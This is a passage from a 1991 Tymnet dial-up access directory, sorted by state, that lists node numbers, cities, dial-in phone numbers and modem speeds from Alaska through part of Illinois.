00000   FAIRBANKS            ALASKA         INTL 907/456-3282
00000 # FAIRBANKS            ALASKA         INTL 907/452-5848  2400 MNP
00000   GLENNALLEN           ALASKA         INTL 907/822-5231
00000   HAINES               ALASKA         INTL 907/766-2171  300
00000   HOMER                ALASKA         INTL 907/235-5239
00000   ILIAMNA              ALASKA         INTL 907/571-1364  STAT MUX
00000   JUNEAU               ALASKA         INTL 907/789-7009
00000 # JUNEAU               ALASKA         INTL 907/789-1976  2400 MNP
00000   KENAI                ALASKA         INTL 907/262-1990
00000   KETCHIKAN            ALASKA         INTL 907/225-1871  STAT MUX
00000   KING SALMON          ALASKA         INTL 907/246-3049
00000   KODIAK               ALASKA         INTL 907/486-4061  STAT MUX
00000   KOTZEBUE             ALASKA         INTL 907/442-2602
00000   MCGRATH              ALASKA         INTL 907/524-3256  STAT MUX
00000   MENANA               ALASKA         INTL 907/832-5214  300
00000   NOME                 ALASKA         INTL 907/443-2256  STAT MUX
00000   NORTHWAY             ALASKA         INTL 907/778-2301  STAT MUX
00000   PALMER/WASILLA       ALASKA         INTL 907/745-0200


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 2

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
00000   PETERSBURG           ALASKA         INTL 907/772-3878  300
00000   PRUDHOE BAY          ALASKA         INTL 907/659-2777
00000   SEWARD               ALASKA         INTL 907/224-3126  STAT MUX
00000   SITKA                ALASKA         INTL 907/747-5887  STAT MUX
00000   SKAGWAY              ALASKA         INTL 907/983-2170  300
00000   SOLDOTNA/KENAI       ALASKA         INTL 907/262-1990
00000   ST. PAUL             ALASKA         INTL 907/546-2320  STAT MUX
00000   TALKEETNA            ALASKA         INTL 907/733-2227  STAT MUX
00000   TANANA               ALASKA         INTL 907/366-7167  STAT MUX
00000   TOK                  ALASKA         INTL 907/883-4747  300
00000   VALDEZ               ALASKA         INTL 907/835-4987  STAT MUX
00000   WASILLA              ALASKA         INTL 907/745-0200
00000   WHITTIER             ALASKA         INTL 907/472-2467  STAT MUX
00000   WRANGELL             ALASKA         INTL 907/874-2394  300
00000   YAKUTAT              ALASKA         INTL 907/784-3453  STAT MUX

07540 # CALGARY              ALBERTA        CANH 403/232-6653  300-2400/MNP

03471 # FLAGSTAFF            ARIZONA        LOW  602/774-3857  300-2400/MNP
02364   MESA/PHOENIX         ARIZONA        HIGH 602/254-5811
02425 # MESA/PHOENIX         ARIZONA        HIGH 602/258-0554  2400/MNP
03663   MESA/PHOENIX         ARIZONA        HIGH 602/258-4528  9600/MNP
02364   PHOENIX              ARIZONA        HIGH 602/254-5811
02425 # PHOENIX              ARIZONA        HIGH 602/258-0554  2400/MNP
05763 # PHOENIX              ARIZONA        HIGH 602/258-0554  2400/MNP
05763 # PHOENIX              ARIZONA        HIGH 602/258-0554  2400/MNP
03663   PHOENIX              ARIZONA        HIGH 602/258-4528  9600/MNP
04157 # TUCSON               ARIZONA        MED  602/297-2239  300-2400/MNP
05603 # YUMA                 ARIZONA        LOW  602/343-9000  300-2400/MNP

06305 # FAYETTEVILLE         ARKANSAS       LOW  501/442-0234  300-2400/MNP
06771 # FT. SMITH            ARKANSAS       LOW  501/782-2486  300-2400/MNP
07463 # HOT SPRINGS          ARKANSAS       LOW  501/623-3576  300-2400/MNP
07464 # JONESBORO            ARKANSAS       LOW  501/935-7957  2400/MNP
11313 + LITTLE ROCK          ARKANSAS       LOW  501/666-1224  9600 BPS
11257 # LITTLE ROCK          ARKANSAS       MED  501/666-6886  300-2400/MNP
04073 # PINE BLUFF           ARKANSAS       LOW  501/535-2629  300-2400/MNP

03137 # BURNABY/VANCOUVER    BRITSH COLUMBI CANH 604/683-7620  300-2400/MNP
03137 # VANCOUVER            BRITSH COLUMBI CANH 604/683-7620  300-2400/MNP

04175   ALAMEDA/OAKLAND      CALIFORNIA     HIGH 415/430-2900
05341 # ALAMEDA/OAKLAND      CALIFORNIA     HIGH 415/633-1896  2400/MNP
03407   ALHAMBRA             CALIFORNIA     MED  818/308-1800
10244 # ALHAMBRA             CALIFORNIA     MED  818/308-1994  2400/MNP
02644   ANAHEIM/NEWPRT BEACH CALIFORNIA     HIGH 714/752-1493  9600/MNP
04236 # ANAHEIM/NEWPRT BEACH CALIFORNIA     HIGH 714/852-8141  2400/MNP
06457 # ANAHEIM/NEWPRT BEACH CALIFORNIA     HIGH 714/852-8141  2400/MNP
05350 # ANTIOCH              CALIFORNIA     LOW  415/754-8222  300-2400/MNP
03407   ARCADIA/ALHAMBRA     CALIFORNIA     MED  818/308-1800
10244 # ARCADIA/ALHAMBRA     CALIFORNIA     MED  818/308-1994  2400/MNP
03657 # BAKERSFIELD          CALIFORNIA     LOW  805/325-0371  300-2400/MNP
04411 # BELMONT/REDWOOD CITY CALIFORNIA     HIGH 415/361-8701  2400/MNP
04175   BERKELEY/OAKLAND     CALIFORNIA     HIGH 415/430-2900


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 3

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05341 # BERKELEY/OAKLAND     CALIFORNIA     HIGH 415/633-1896  2400/MNP
03410   BEVERLY HILLS/SHR OK CALIFORNIA     MED  818/789-9002
04353 # BEVERLY HILLS/SHR OK CALIFORNIA     MED  818/789-9557  2400/MNP
02443 # BURBANK              CALIFORNIA     LOW  818/841-4795  300-2400/MNP
04504 # BURLINGAME/SO. S.F.  CALIFORNIA     LOW  415/588-3043  300-2400/MNP
03410   CANOGA PARK/SHRM OAK CALIFORNIA     MED  818/789-9002
04353 # CANOGA PARK/SHRM OAK CALIFORNIA     MED  818/789-9557  2400/MNP
11271 # CATHEDRAL CITY       CALIFORNIA     LOW  619/324-0920  300-2400/MNP
03307 # CHICO                CALIFORNIA     LOW  916/343-4401  300-2400/MNP
04046 + COLTON               CALIFORNIA     MED  714/872-0394  9600/MNP
02655   COLTON/RIVERSIDE     CALIFORNIA     MED  714/370-1200
05325 # COLTON/RIVERSIDE     CALIFORNIA     MED  714/422-0222  2400/MNP
05362 # CONCORD/WALNUT CREEK CALIFORNIA     MED  415/935-1507  2400/MNP
10436 # CONCORD/WALNUT CREEK CALIFORNIA     MED  `415/935-1507 2400/MNP
07652   CORONA               CALIFORNIA     LOW  714/737-5510
04263 # COVINA/DIAMOND BAR   CALIFORNIA     MED  714/860-0057  300-2400/MNP
07434   DAVIS                CALIFORNIA     LOW  916/758-3551
04263 # DIAMOND BAR          CALIFORNIA     MED  714/860-0057  300-2400/MNP
03407   EL MONTE/ALHAMBRA    CALIFORNIA     MED  818/308-1800
10244 # EL MONTE/ALHAMBRA    CALIFORNIA     MED  818/308-1994  2400/MNP
04755   EL SEGUNDO           CALIFORNIA     MED  213/643-2907
10363 # EL SEGUNDO           CALIFORNIA     MED  213/643-4228  2400/MNP
04262 # ESCONDIDO/VISTA      CALIFORNIA     MED  619/941-6700  300-2400/MNP
11052 # EUREKA               CALIFORNIA     LOW  707/445-3021  300-2400/MNP
11052 # EUREKA               CALIFORNIA     LOW  707/445-9271  300-2400/MNP
10072 # FAIRFIELD            CALIFORNIA     LOW  707/426-5900  300-2400/MNP
07117 # FREMONT              CALIFORNIA     MED  415/490-7366  300-2400/MNP
04107 # FRESNO               CALIFORNIA     LOW  209/442-4328  300-2400/MNP
02443 # GLENDALE/BURBANK     CALIFORNIA     LOW  818/841-4795  300-2400/MNP
04175   HAYWARD/OAKLAND      CALIFORNIA     HIGH 415/430-2900
05341 # HAYWARD/OAKLAND      CALIFORNIA     HIGH 415/633-1896  2400/MNP
06575 # INGLEWOOD            CALIFORNIA     HIGH 213/587-7514  2400/MNP
05242   INGLEWOOD/VERNON     CALIFORNIA     HIGH 213/587-0030
05241   INGLEWOOD/VERNON     CALIFORNIA     HIGH 213/587-0030
10325 # INGLEWOOD/VERNON     CALIFORNIA     HIGH 213/587-7514  2400/MNP
07533   INGLEWOOD/VERNON     CALIFORNIA     HIGH 213/588-8128  9600/MNP
02644   IRVINE/NEWPORT BEACH CALIFORNIA     HIGH 714/752-1493  9600/MNP
04236 # IRVINE/NEWPORT BEACH CALIFORNIA     HIGH 714/852-8141  2400/MNP
02614 # LANCASTER            CALIFORNIA     LOW  805/945-4962  300-2400/MNP
03406   LONG BEACH           CALIFORNIA     MED  213/435-0900
07404 # LONG BEACH           CALIFORNIA     MED  213/436-6033  2400/MNP
07205   LOS ALTOS/SAN JOSE   CALIFORNIA     HIGH 408/432-3430
03725   LOS ALTOS/SAN JOSE   CALIFORNIA     HIGH 408/432-0804  9600/MNP
06605 # LOS ALTOS/SAN JOSE   CALIFORNIA     HIGH 408/432-8618  2400/MNP
05242   LOS ANGELES/VERNON   CALIFORNIA     HIGH 213/587-0030
05241   LOS ANGELES/VERNON   CALIFORNIA     HIGH 213/587-0030
06575 # LOS ANGELES/VERNON   CALIFORNIA     HIGH 213/587-7514  2400/MNP
10325 # LOS ANGELES/VERNON   CALIFORNIA     HIGH 213/587-7514  2400/MNP
07533   LOS ANGELES/VERNON   CALIFORNIA     HIGH 213/588-8128  9600/MNP
04755   MAR VISTA/EL SEGUNDO CALIFORNIA     MED  213/643-2907
10363 # MAR VISTA/EL SEGUNDO CALIFORNIA     MED  213/643-4228  2400/MNP
10363 # MARINADELREY/EL SGND CALIFORNIA     MED  213/643-4228  2400/MNP
10036 # MERCED               CALIFORNIA     LOW  209/383-7593  300-2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 4

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
11402 # MODESTO              CALIFORNIA     LOW  209/527-0150  300-2400/MNP
10474 # MONTEREY             CALIFORNIA     LOW  408/375-2644  300-2400/MNP
11272 # MOORPARK             CALIFORNIA     LOW  805/523-0203  300-2400/MNP
07632 # NAPA                 CALIFORNIA     LOW  707/257-6810  300-2400/MNP
02631   NEWPORT BEACH        CALIFORNIA     HIGH 714/756-8341
02644   NEWPORT BEACH        CALIFORNIA     HIGH 714/752-1493  9600/MNP
04236 # NEWPORT BEACH        CALIFORNIA     HIGH 714/852-8141  2400/MNP
03406   NORWALK/LONG BEACH   CALIFORNIA     MED  213/435-0900
07404 # NORWALK/LONG BEACH   CALIFORNIA     MED  213/436-6033  2400/MNP
04175   OAKLAND              CALIFORNIA     HIGH 415/430-2900
05341 # OAKLAND              CALIFORNIA     HIGH 415/633-1896  2400/MNP
04263 # ONTARIO/DIAMOND BAR  CALIFORNIA     MED  714/860-0057  300-2400/MNP
04154 # OXNARD/PORT HUENEME  CALIFORNIA     MED  805/985-7843  300-2400/MNP
05362 # PACHECO/WALNUT CREEK CALIFORNIA     MED  415/935-1507  2400/MNP
10436 # PACHECO/WALNUT CREEK CALIFORNIA     MED  415/935-1507  2400/MNP
11271 # PALM SPRNGS/CATH CTY CALIFORNIA     LOW  619/324-0920  300-2400/MNP
04411 # PALO ALTO/REDWD CITY CALIFORNIA     HIGH 415/361-8701  2400/MNP
03407   PASADENA/ALHAMBRA    CALIFORNIA     MED  818/308-1800
10244 # PASADENA/ALHAMBRA    CALIFORNIA     MED  818/308-1994  2400/MNP
04014   PLEASANTON           CALIFORNIA     LOW  415/462-2101
10436 # PLEASNTHILL/WALNT CK CALIFORNIA     MED  415/935-1507  2400/MNP
05362 # PLEASNTHILL/WALNT CK CALIFORNIA     MED  415/935-1507  2400/MNP
04263 # POMONA/DIAMOND BAR   CALIFORNIA     MED  714/860-0057  300-2400/MNP
04154 # PORT HUENEME         CALIFORNIA     MED  805/985-7843  300-2400/MNP
07653 # POWAY                CALIFORNIA     LOW  619/679-0200  300-2400/MNP
04722 # REDDING              CALIFORNIA     LOW  916/241-4820  300-2400/MNP
04603   REDWOOD CITY         CALIFORNIA     HIGH 415/366-1092
04411 # REDWOOD CITY         CALIFORNIA     HIGH 415/361-8701  2400/MNP
06301 + REDWOOD CITY         CALIFORNIA     LOW  415/367-0334  9600
02655   RIVERSIDE            CALIFORNIA     MED  714/370-1200
05325 # RIVERSIDE            CALIFORNIA     MED  714/422-0222  2400/MNP
03300   SACRAMENTO           CALIFORNIA     HIGH 916/448-4300
07542 + SACRAMENTO           CALIFORNIA     LOW  916/442-0992  9600BPS
10130 # SACRAMENTO           CALIFORNIA     HIGH 916/447-7434  2400/MNP
03412 # SALINAS              CALIFORNIA     LOW  408/754-2206  300-2400/MNP
05325 # SAN BERNADINO/RIVRSD CALIFORNIA     MED  714/422-0222  2400/MNP
11273 # SAN CLEMENTE         CALIFORNIA     LOW  714/240-9424  300-2400/MNP
04360   SAN DIEGO            CALIFORNIA     HIGH 619/296-3370
05646 # SAN DIEGO            CALIFORNIA     HIGH 619/296-8747  2400/MNP
02665 # SAN DIEGO            CALIFORNIA     HIGH 619/296-8747  2400/MNP
03410   SAN FERNANDO/SHM OAK CALIFORNIA     MED  818/789-9002
04353 # SAN FERNANDO/SHR OK  CALIFORNIA     MED  818/789-9557  2400/MNP
03036   SAN FRANCISCO        CALIFORNIA     HIGH 415/974-1300
03706   SAN FRANCISCO        CALIFORNIA     HIGH 415/974-1300
07417   SAN FRANCISCO        CALIFORNIA     HIGH 415/495-7220  9600/MNP
07377 # SAN FRANCISCO        CALIFORNIA     HIGH 415/543-0691  2400/MNP
07420 # SAN FRANCISCO        CALIFORNIA     HIGH 415/543-0691  2400/MNP
03035 # SAN FRANCISCO        CALIFORNIA     WATS 800/###-####  300-2400/MNP
02704 # SAN FRANCISCO        CALIFORNIA     WATS 800/###-####  300-2400/MNP
07205   SAN JOSE             CALIFORNIA     HIGH 408/432-3430
03725   SAN JOSE             CALIFORNIA     HIGH 408/432-0804  9600/MNP
06605 # SAN JOSE             CALIFORNIA     HIGH 408/432-8618  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 5

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
10561   SAN JOSE             CALIFORNIA     WATS 800/###-####  2400 BPS
04255 # SAN LUIS OBISPO      CALIFORNIA     LOW  805/549-0770  300-2400/MNP
04504 # SAN MATEO/SOUTH S.F. CALIFORNIA     LOW  415/588-3043  300-2400/MNP
03406   SAN PEDRO/LONG BEACH CALIFORNIA     MED  213/435-0900
07404 # SAN PEDRO/LONG BEACH CALIFORNIA     MED  213/436-6033  2400/MNP
11270 # SAN RAFAEL           CALIFORNIA     LOW  415/453-2087  300-2400/MNP
02644   SANTA ANA/NEWPRT BCH CALIFORNIA     HIGH 714/752-1493  9600/MNP
04236 # SANTA ANA/NEWPRT BCH CALIFORNIA     HIGH 714/852-8141  2400/MNP
11371   SANTA BARBARA        CALIFORNIA     MED  805/564-2354
11372 # SANTA BARBARA        CALIFORNIA     MED  805/965-1612  2400/MNP
03725   SANTA CLARA/SAN JOSE CALIFORNIA     HIGH 408/432-0804  9600/MNP
06605 # SANTA CLARA/SAN JOSE CALIFORNIA     HIGH 408/432-8618  2400/MNP
10561   SANTA CLARA/SAN JOSE CALIFORNIA     WATS 800/###-####  2400 BPS
03505   SANTA CRUZ           CALIFORNIA     MED  408/475-0981
06022 # SANTA MARIA          CALIFORNIA     LOW  805/922-3308  300-2400/MNP
04755   SANTA MONICA/EL SGND CALIFORNIA     MED  213/643-2907
10363 # SANTA MONICA/EL SGND CALIFORNIA     MED  213/643-4228  2400/MNP
04153 # SANTA ROSA           CALIFORNIA     LOW  707/527-6180  300-2400/MNP
03410   SHERMAN OAKS         CALIFORNIA     MED  818/789-9002
04353 # SHERMAN OAKS         CALIFORNIA     MED  818/789-9557  2400/MNP
03235 # SHERMAN OAKS         CALIFORNIA     MED  818/789-9557  2400/MNP
04504 # SOUTH S.F.           CALIFORNIA     LOW  415/588-3043  300-2400/MNP
03522   STOCKTON             CALIFORNIA     LOW  209/467-0601
07205   SUNNYVALE/SAN JOSE   CALIFORNIA     HIGH 408/432-3430
03725   SUNNYVALE/SAN JOSE   CALIFORNIA     HIGH 408/432-0804  9600/MNP
06605 # SUNNYVALE/SAN JOSE   CALIFORNIA     HIGH 408/432-8618  2400/MNP
05046 # UPLAND               CALIFORNIA     LOW  714/985-1153  300-2400/MNP
03120 # VALLEJO              CALIFORNIA     LOW  707/644-1192  300-2400/MNP
03410   VAN NUYS/SHERMAN OAK CALIFORNIA     MED  818/789-9002
04353 # VAN NUYS/SHERMAN OAK CALIFORNIA     MED  818/789-9557  2400/MNP
04154 # VENTURA/PORT HUENEME CALIFORNIA     MED  805/985-7843  300-2400/MNP
05241   VERNON               CALIFORNIA     HIGH 213/587-0030
05242   VERNON               CALIFORNIA     HIGH 213/587-0030
10325 # VERNON               CALIFORNIA     HIGH 213/587-7514  2400/MNP
06575 # VERNON               CALIFORNIA     HIGH 213/587-7514  2400/MNP
07533   VERNON               CALIFORNIA     HIGH 213/588-8128  9600/MNP
06147 # VISALIA              CALIFORNIA     LOW  209/625-4891  300-2400/MNP
04262 # VISTA                CALIFORNIA     MED  619/941-6700  300-2400/MNP
04263 # W.COVINA/DIAMOND BAR CALIFORNIA     MED  714/860-0057  300-2400/MNP
04556   WALNUT CREEK         CALIFORNIA     LOW  415/935-0370
10436 # WALNUT CREEK         CALIFORNIA     MED  415/935-1507  2400/MNP
05362 # WALNUT CREEK         CALIFORNIA     MED  415/935-1507  2400/MNP
03410   WEST L.A./SHRMN OAKS CALIFORNIA     MED  818/789-9002
04353 # WEST L.A./SHRMN OAKS CALIFORNIA     MED  818/789-9557  2400/MNP
07434   WOODLAND/DAVIS       CALIFORNIA     LOW  916/758-3551

02414   AURORA/DENVER        COLORADO       HIGH 303/830-9210
06651   AURORA/DENVER        COLORADO       HIGH 303/830-8530  9600/MNP
05500 # AURORA/DENVER        COLORADO       HIGH 303/832-3447  2400/MNP
06655 # AURORA/DENVER        COLORADO       HIGH 303/832-3447  2400/MNP
02414   BOULDER/DENVER       COLORADO       HIGH 303/830-9210
06651   BOULDER/DENVER       COLORADO       HIGH 303/830-8530  9600/MNP
06655 # BOULDER/DENVER       COLORADO       HIGH 303/832-3447  2400/MNP
05500 # BOULDER/DENVER       COLORADO       HIGH 303/832-3447  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 6

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
03603 # COLORADO SPRINGS     COLORADO       MED  719/590-1003  300-2400/MNP
02414   DENVER               COLORADO       HIGH 303/830-9210
06651   DENVER               COLORADO       HIGH 303/830-8530  9600/MNP
06655 # DENVER               COLORADO       HIGH 303/832-3447  2400/MNP
05500 # DENVER               COLORADO       HIGH 303/832-3447  2400/MNP
11266 # FORT COLLINS         COLORADO       LOW  303/224-9819  300-2400/MNP
02347 # GRAND JUNCTION       COLORADO       LOW  303/241-1643  300-2400/MNP
07322 # GREELEY              COLORADO       LOW  303/352-0960  300-2400/MNP
07200 # PUEBLO               COLORADO       LOW  719/543-9712  300-2400/MNP

02357   BLOOMFIELD           CONNECTICUT    HIGH 203/242-7140
04304 # BLOOMFIELD           CONNECTICUT    HIGH 203/242-1986  2400/MNP
03511 # BLOOMFIELD           CONNECTICUT    HIGH 203/242-1986  2400/MNP
07220   BRIDGEPORT           CONNECTICUT    MED  203/579-1479
11275 # BRIDGEPORT           CONNECTICUT    MED  203/332-7256  2400/MNP
04044   DANBURY              CONNECTICUT    LOW  203/797-9539
03026   MERIDEN              CONNECTICUT    LOW  203/634-9249
03415   NEW HAVEN/NO. HAVEN  CONNECTICUT    MED  203/773-0082
06624 # NEW HAVEN/NO. HAVEN  CONNECTICUT    MED  203/787-4674  2400/MNP
04040 # NEW LONDON           CONNECTICUT    LOW  203/444-7030  300-2400/MNP
03415   NORTH HAVEN          CONNECTICUT    MED  203/773-0082
04040 # NORWICH/NEW LONDON   CONNECTICUT    LOW  203/444-7030  300-2400/MNP
10172 # SOMERS               CONNECTICUT    LOW  203/763-3521  300-2400/MNP
02653   STAMFORD             CONNECTICUT    HIGH 203/965-0000
11362 # STAMFORD             CONNECTICUT    HIGH 203/327-2974  2400/MNP
03356   WATERBURY            CONNECTICUT    LOW  203/755-5994
10113 # WESTPORT             CONNECTICUT    MED  203/454-2129  300-2400/MNP

02544   WASHINGTON           D.C.           HIGH 703/691-8200
02545   WASHINGTON           D.C.           HIGH 703/691-8200
04346   WASHINGTON           D.C.           HIGH 703/691-8200
04075 # WASHINGTON           D.C.           HIGH 703/352-3136  2400/MNP
02035 # WASHINGTON           D.C.           HIGH 703/352-3136  2400/MNP
06256   WASHINGTON           D.C.           HIGH 703/385-7587  9600/MNP

07511 # DOVER                DELAWARE       LOW  302/678-9545  300-2400/MNP
11702 # GEORGETOWN           DELAWARE       LOW  302/856-1788  300-2400 BPS
04430   NEWARK/WILMINGTON    DELAWARE       MED  302/652-2060
11304 # NEWARK/WILMINGTON    DELAWARE       MED  302/652-2036  2400/MNP
04430   WILMINGTON           DELAWARE       MED  302/652-2060
11304 # WILMINGTON           DELAWARE       MED  302/652-2036  2400/MNP

03046   SANTO DOMINGO        DOMINICAN RPBL INTL 809/685-6151  300/1200 BPS

07150 # BOCA RATON/DELRAY    FLORIDA        LOW  407/272-7900  300-2400/MNP
03606 # BOYNTN BCH/WPALM BCH FLORIDA        MED  407/471-9310  300-2400/MNP
03456   CLEARWATER           FLORIDA        MED  813/441-9017
11035 # CLEARWATER           FLORIDA        MED  813/441-1621  2400/MNP
03737 + CLEARWATER           FLORIDA        MED  813/443-4515  9600/MNP
03213 # COCOA                FLORIDA        LOW  407/639-3022  300-2400/MNP
07150 # DELRAY               FLORIDA        LOW  407/272-7900  300-2400/MNP
03405 # FORT MEYERS          FLORIDA        LOW  813/337-0006  300-2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 7

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05304 # FORT PIERCE          FLORIDA        LOW  407/466-5661  300-2400/MNP
03165   FT. LAUDERDALE       FLORIDA        MED  305/463-0882
06770 # FT. LAUDERDALE       FLORIDA        MED  305/467-1870  2400/MNP
05733 # GAINESVILLE          FLORIDA        LOW  904/335-0544  2400/MNP
06770 # HOLLYWD/FT LDRDL     FLORIDA        MED  305/467-1870  2400/MNP
03165   HOLLYWD/FT. LAUDRDLE FLORIDA        MED  305/463-0882
03100   JACKSONVILLE         FLORIDA        MED  904/721-8100
05043 # JACKSONVILLE         FLORIDA        MED  904/721-8559  2400/MNP
02521 + JACKSONVILLE         FLORIDA        MED  904/724-5994  9600/MNP
06376 # KISSIMMEE            FLORIDA        LOW  407/933-8425  300-2400/MNP
04165   LAKELAND             FLORIDA        LOW  813/858-6970
04164 # LAKELAND             FLORIDA        LOW  813/858-6970  300-2400/MNP
04000   LONGWOOD/ORLANDO     FLORIDA        MED  407/841-0020
04142 # LONGWOOD/ORLANDO     FLORIDA        MED  407/841-0217  2400/MNP
03213 # MELBOURNE/COCOA      FLORIDA        LOW  407/639-3022  300-2400/MNP
03213 # MERRIT ISLE/COCOA    FLORIDA        LOW  407/639-3022  300-2400/MNP
06574   MIAMI                FLORIDA        HIGH 305/599-2900
07264   MIAMI                FLORIDA        HIGH 305/592-2357  9600/MNP
03625 # MIAMI                FLORIDA        HIGH 305/599-2964  2400/MNP
10221 # NAPLES               FLORIDA        LOW  813/434-8080  300-2400/MNP
10213 # OCALA                FLORIDA        LOW  904/732-3707  2400/MNP
04000   ORLANDO              FLORIDA        MED  407/841-0020
04142 # ORLANDO              FLORIDA        MED  407/841-0217  2400/MNP
02326 # ORMOND BEACH         FLORIDA        LOW  904/673-0034  300-2400/MNP
07725 # PANAMA CITY          FLORIDA        LOW  904/769-0709  300-2400/MNP
03515 # PENSACOLA            FLORIDA        LOW  904/477-3344  300-2400/MNP
06770 # POMPNO BCH/FT LDRDL  FLORIDA        MED  305/467-1870  2400/MNP
03165   POMPNO BCH/FT. LDRDL FLORIDA        MED  305/463-0882
06346 # PORT ST. LUCIE       FLORIDA        LOW  407/337-1992  300-2400/MNP
07043 # SARASOTA             FLORIDA        LOW  813/952-9000  300-2400/MNP
03456   ST. PETERSBRG/CLRWTR FLORIDA        MED  813/441-9017
11035 # ST. PETERSBRG/CLRWTR FLORIDA        MED  813/441-1621  2400/MNP
03514 # TALLAHASSEE          FLORIDA        LOW  904/878-2267  300-2400/MNP
04100   TAMPA                FLORIDA        MED  813/932-7070
04064 # TAMPA                FLORIDA        MED  813/933-6210  2400/MNP
07712 # VERO BEACH           FLORIDA        LOW  407/569-8207  300-2400/MNP
03606 # WEST PALM BEACH      FLORIDA        MED  407/471-9310  300-2400/MNP
04165   WINTERHAVEN/LAKELAND FLORIDA        LOW  813/858-6970
04164 # WINTERHAVEN/LAKELAND FLORIDA        LOW  813/858-6970  300-2400/MNP

07031 # ALBANY               GEORGIA        LOW  912/888-9282  300-2400/MNP
06412 # ATHENS               GEORGIA        LOW  404/548-7006  300-2400/MNP
10134   ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-2208
10133   ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-2208
10254   ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-1546  9600/MNP
10203 # ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-3362  2400/MNP
10204 # ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-3362  2400/MNP
10204 # ATLANTA/DORAVILLE    GEORGIA        HIGH 404/451-3362  2400/MNP
03121 # AUGUSTA/MARTINEZ     GEORGIA        LOW  404/855-0442  300-2400/MNP
11406 # AUGUSTA/MARTINEZ     GEORGIA        LOW  404/855-0442  300-2400/MNP
04443 # COLUMBUS             GEORGIA        LOW  404/327-0597  300-2400/MNP
10133   DORAVILLE            GEORGIA        HIGH 404/451-2208
10134   DORAVILLE            GEORGIA        HIGH 404/451-2208
10254   DORAVILLE            GEORGIA        HIGH 404/451-1546  9600/MNP
10203 # DORAVILLE            GEORGIA        HIGH 404/451-3362  2400/MNP
06130 # MACON/WARNER ROBINS  GEORGIA        LOW  912/923-7590  300-2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE 8

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
10133   MARIETTA/DORAVILLE   GEORGIA        HIGH 404/451-2208
10134   MARIETTA/DORAVILLE   GEORGIA        HIGH 404/451-2208
10254   MARIETTA/DORAVILLE   GEORGIA        HIGH 404/451-1546  9600/MNP
10204 # MARIETTA/DORAVILLE   GEORGIA        HIGH 404/451-3362  2400/MNP
10203 # MARIETTA/DORAVILLE   GEORGIA        HIGH 404/451-3362  2400/MNP
11406 # MARTINEZ             GEORGIA        LOW  404/855-0442  300-2400/MNP
03121 # MARTINEZ             GEORGIA        LOW  404/855-0442  300-2400/MNP
10134   NORCROSS/DORAVILLE   GEORGIA        HIGH 404/451-2208
10133   NORCROSS/DORAVILLE   GEORGIA        HIGH 404/451-2208
10254   NORCROSS/DORAVILLE   GEORGIA        HIGH 404/451-1546  9600/MNP
10204 # NORCROSS/DORAVILLE   GEORGIA        MED  404/451-3362  2400/MNP
10203 # NORCROSS/DORAVILLE   GEORGIA        HIGH 404/451-3362  2400/MNP
07301 # ROME                 GEORGIA        LOW  404/234-0102  300-2400/MNP
03607 # SAVANNAH             GEORGIA        LOW  912/232-6751  300-2400/MNP
06130 # WARNER ROBINS        GEORGIA        LOW  912/923-7590  300-2400/MNP

07312 # AGANA HEIGHTS        GUAM           INTL 671/477-2222  2400 BPS
06056   SAIPAN               GUAM           INTL 670/234-1121

10574   HILO                 HAWAII         MED  808/935-5717
10631   HONOLULU             HAWAII         MED  808/545-7610
10632 # HONOLULU             HAWAII         MED  808/528-5300  2400/MNP
12534 * LAHAINA, MAUI        HAWAII         LOW  808-661-7688  2400/MNP
10573   MAUI                 HAWAII         LOW  808/242-8411

02565   BOISE                IDAHO          MED  208/343-0404
04253 # BOISE                IDAHO          LOW  208/345-5951  2400/MNP
05504 # COEUR D'ALENE        IDAHO          LOW  208/765-1465  300-2400 BPS
03630 # IDAHO FALLS          IDAHO          LOW  208/522-3624  300-2400/MNP
03521 # POCATELLO            IDAHO          LOW  208/233-2501  300-2400/MNP
05151 # TWIN FALLS           IDAHO          LOW  208/734-0221  300-2400/MNP

03031   AURORA               ILLINOIS       LOW  708/844-0700
05437 # BLOOMINGTON          ILLINOIS       LOW  309/827-2748  300-2400/MNP
10247 # BRADLEY              ILLINOIS       LOW  815/935-2352  300-2400/MNP
02367 # CHAMPAIGN/URBANA     ILLINOIS       LOW  217/344-3400  300-2400/MNP
03151   CHICAGO              ILLINOIS       HIGH 312/922-4601
03152   CHICAGO              ILLINOIS       HIGH 312/922-4601
06324   CHICAGO              ILLINOIS       HIGH 312/427-7579  9600/MNP
06325 # CHICAGO              ILLINOIS       HIGH 312/922-6571  2400/MNP
06321 # CHICAGO              ILLINOIS       HIGH 312/922-6571  2400/MNP
11152 # CHICAGO              ILLINOIS       WATS 800/###-####  300-2400/MNP
11151 # CHICAGO              ILLINOIS       WATS 800/###-####  300-2400/MNP
11150 # CHICAGO              ILLINOIS       WATS 800/###-####  300-2400/MNP
07731   CICERO/MAYWOOD       ILLINOIS       LOW  708/345-9100
07303 # DANVILLE             ILLINOIS       LOW  217/442-1452  300-2400/MNP
04305 # DECATUR              ILLINOIS       LOW  217/425-8864  300-2400/MNP
02465   DOWNRS GROVE/GLN ELN ILLINOIS       MED  708/790-4400
02244 # DOWNRS GROVE/GLN ELN ILLINOIS       MED  708/790-4955  2400/MNP
10617 # E. ST. LOUIS         ILLINOIS       LOW  618/874-5702  300-2400/MNP
